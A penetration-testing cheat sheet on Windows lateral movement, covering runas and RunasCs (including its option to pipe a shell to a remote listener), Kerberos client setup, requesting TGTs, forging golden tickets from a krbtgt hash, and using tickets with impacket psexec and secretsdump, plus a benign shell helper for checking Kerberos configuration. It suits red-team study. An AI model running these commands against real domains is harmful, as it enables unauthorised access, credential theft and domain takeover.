Lateral Movement

RunAs

Use the built-in runas command to run a command on the same host under another user's credentials. runas prompts for the password on the console, so it needs an interactive session. Start-Process with -Verb runAs is a different thing: it asks UAC to elevate the current user to a high-integrity (administrator) process, it does not switch to another account.

runas /user:<DOMAIN>\<USER> <COMMAND, ex. cmd>
# add /netonly to use the credentials only for network access (local token stays the current user)
# or, to elevate the current user through UAC rather than change user:
Start-Process cmd.exe -Verb runAs

RunasCs (RunasCs.exe, or the Invoke-RunasCs.ps1 module) is an open-source reimplementation of runas that takes the password on the command line and works from non-interactive contexts such as a reverse shell, where the built-in runas cannot prompt. It is a local technique: the new process runs as the target user on the host you already control, so you can act as a user who is not allowed to log on remotely (no WinRM/RDP rights) by starting from the session of a user who is.

Import-Module .\Invoke-RunasCs.ps1
Invoke-RunasCs <USER> <PASS> "cmd /c whoami /all"
# -r is a RunasCs option (not part of the command): it connects the new process's stdin/stdout/stderr to a listener on <IP>:<PORT>
.\RunasCs.exe <USER> <PASS> cmd.exe -r <IP>:<PORT>
# if the default logon type is denied for that user, try another one with -l (see the tool's help)

Kerberos Tickets

Configure /etc/hosts and /etc/krb5.conf so the DC's FQDN resolves and the realm maps to it. Kerberos identifies services by SPN (e.g. cifs/dc.domain.com), so targets must later be given by host name, not IP. Also sync your clock with the DC first (e.g. ntpdate <IP>): the KDC rejects requests with more than a few minutes of skew (5 minutes by default).

/etc/hosts
<IP>     <DOMAIN.COM> <DC.DOMAIN.COM>
/etc/krb5.conf
# the realm name is upper-case by convention
[libdefaults]
  default_realm = <DOMAIN.COM>
  forwardable = yes
  dns_lookup_kdc = false
  dns_lookup_realm = false

[realms]
  <DOMAIN.COM> = {
    kdc = <DC.DOMAIN.COM>
  }

Get the TGT

# request a real TGT with a password (or -hashes :<NTHASH> / -aesKey <KEY>); writes <USER>.ccache
getTGT.py -dc-ip <IP> '<DOMAIN.COM>/<USER>:<PASS>'
# or forge a golden ticket: -nthash is the krbtgt account's NT hash; writes <NEW_USER>.ccache
ticketer.py -nthash <KRBTGT_NTHASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN.COM> <NEW_USER>
# or with other techniques (e.g. a ticket dumped from a compromised host, converted from .kirbi to .ccache)

Import it

chmod 600 <USER>.ccache          # the cache is a usable credential; keep it owner-readable only
export KRB5CCNAME=<USER>.ccache  # impacket and the krb5 tools read the cache from this variable; use an absolute path if you change directories
klist                            # confirm the TGT is loaded and not expired

Use with Kerberos authentication (-k -no-pass). The target must be the host name configured in /etc/hosts, matching the service's SPN; an IP address will fail with a Kerberos error.

impacket-smbclient -k -no-pass '<DOMAIN.COM>/<USER>@<DC.DOMAIN.COM>'
impacket-psexec -k -no-pass '<DOMAIN.COM>/<USER>@<DC.DOMAIN.COM>'
# same for impacket-secretsdump, impacket-wmiexec, etc. (the pip-installed scripts are named smbclient.py, psexec.py, ... instead of impacket-*)
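The Kerberos client setup above, as an added example that is not from the original page and is not an impacket tool: POSIX sh helpers that write the krb5.conf for one realm, add the DC to the hosts file, reject -k targets given as an IP instead of the SPN host name, and check that the ccache named by KRB5CCNAME exists with mode 600. The names domain.com, dc.domain.com and 10.10.10.5 used in the comments are placeholders, not real hosts.

```shell
#!/bin/sh
# Added helper (not part of the original cheat sheet, not an impacket tool):
# POSIX sh functions that prepare and sanity-check the Kerberos client setup.
# Realm, KDC and file paths are parameters; any host names are placeholders.

# Write a minimal krb5.conf for one realm. Realm names are upper-case by
# convention, so the realm is upper-cased even if the DNS domain is passed
# in lower case; the [domain_realm] section maps the DNS domain to it.
krb_write_conf() {
  realm=$(printf '%s' "$1" | tr '[:lower:]' '[:upper:]')
  dom=$(printf '%s' "$1" | tr '[:upper:]' '[:lower:]')
  kdc=$2
  out=${3:-/etc/krb5.conf}
  cat > "$out" <<EOF
[libdefaults]
  default_realm = $realm
  forwardable = yes
  dns_lookup_kdc = false
  dns_lookup_realm = false

[realms]
  $realm = {
    kdc = $kdc
  }

[domain_realm]
  .$dom = $realm
  $dom = $realm
EOF
}

# True if the argument looks like a dotted-quad IPv4 address.
krb_is_ipv4() {
  printf '%s\n' "$1" | grep -qE '^([0-9]{1,3}\.){3}[0-9]{1,3}$'
}

# Refuse targets that will not work with -k: Kerberos looks the service up
# by SPN (cifs/dc.domain.com), so the target must be a host name, and since
# dns_lookup_kdc is off that name must be listed (case-insensitively) in the
# hosts file. Comment lines in the hosts file do not count.
krb_check_target() {
  target=$1
  hosts=${2:-/etc/hosts}
  if krb_is_ipv4 "$target"; then
    echo "refusing $target: Kerberos needs the SPN host name, use the FQDN from $hosts" >&2
    return 1
  fi
  lc=$(printf '%s' "$target" | tr '[:upper:]' '[:lower:]')
  awk -v h="$lc" '!/^[[:space:]]*#/ { for (i = 2; i <= NF; i++) if (tolower($i) == h) found = 1 }
                  END { if (found) exit 0; exit 1 }' "$hosts" ||
    { echo "refusing $target: not present in $hosts" >&2; return 1; }
}

# Append "<ip> <domain> <dc_fqdn>" to the hosts file unless the DC is already there.
krb_add_host() {
  ip=$1; domain=$2; dc=$3; hosts=${4:-/etc/hosts}
  krb_check_target "$dc" "$hosts" 2>/dev/null && return 0
  printf '%s\t%s %s\n' "$ip" "$domain" "$dc" >> "$hosts"
}

# Check the ccache the tools will use: the file given as argument, or the one
# named by KRB5CCNAME (an optional "FILE:" prefix is stripped), must exist and
# be readable only by its owner, because it holds a usable credential.
krb_check_ccache() {
  f=${1:-${KRB5CCNAME#FILE:}}
  [ -n "$f" ] && [ -f "$f" ] || { echo "no ccache file at '$f'" >&2; return 1; }
  mode=$(stat -c '%a' "$f" 2>/dev/null || stat -f '%Lp' "$f")
  [ "$mode" = "600" ] || { echo "ccache $f has mode $mode, expected 600" >&2; return 1; }
}
```

Source the file, then run krb_write_conf domain.com dc.domain.com and krb_add_host <IP> domain.com dc.domain.com as root; after getTGT.py and export KRB5CCNAME, run krb_check_ccache and krb_check_target dc.domain.com before the impacket commands, so a wrong target or a world-readable cache is caught before the first Kerberos error.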
